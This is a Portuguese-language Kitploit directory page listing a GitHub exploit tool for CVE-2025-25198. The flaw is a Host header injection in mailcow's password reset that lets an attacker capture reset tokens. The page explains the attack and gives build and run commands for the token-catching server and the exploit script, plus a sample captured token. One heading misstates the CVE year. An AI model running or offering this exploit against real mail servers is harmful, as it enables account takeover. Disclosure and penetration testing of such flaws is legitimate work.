Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25198 — Captura tokens de redefinição de senha em ataques de injeção de cabeçalho Host no Mailcow. | Kitploit
Ferramentas/GitHubGitHub/enzocipher/cve-2025-25198
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

Captura tokens de redefinição de senha em ataques de injeção de cabeçalho Host no Mailcow.

Ver Repositório
12há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-25198

mailcow: dockerized é uma suíte de e-mail/groupware de código aberto baseada em docker. Antes da versão 2025-01a, uma vulnerabilidade na funcionalidade de redefinição de senha do mailcow permite que um atacante manipule o cabeçalho Host HTTP para gerar um link de redefinição de senha apontando para um domínio controlado pelo atacante. Isso pode levar à tomada de conta se um usuário clicar no link envenenado.

Como funciona?

Configura um servidor https para ouvir todas as solicitações e envia uma solicitação POST para o site com o cabeçalho Host contendo o seu selecionado. Você também pode usar o Burpsuite para enviar a solicitação e obter o Token no servidor.

Recursos

  • Servidor HTTPS que recupera o Token de Alteração de Senha
  • Script de exploit que ataca a vulnerabilidade do site.
  • Tudo corrigido e não requer mais openssl para funcionar

Pré-requisitos

  • Go 1.16 ou superior

Script do Servidor

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

Script de Exploit

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | opcional >

Após aguardar um pouco, o servidor exibirá o token que você pode usar:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
Baixar ferramenta